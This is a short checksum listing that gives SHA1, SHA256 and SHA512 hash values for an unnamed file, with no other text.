SHA1951f8c9a885b89f2c6f4a08ce0b2a1189a641a48
SHA256f85b0d0277ef8841d05cf5f8d72303984ccfcb48e78b98e629155c9a7a4eb007
SHA51297e9bd5c5ff31797a2c7e0c2b72fd79367abb9f44e99e4a350c827f659eef349ca77e386538e00b56a2adaf38be0190b421985179101b3560aef773b1e92a2c1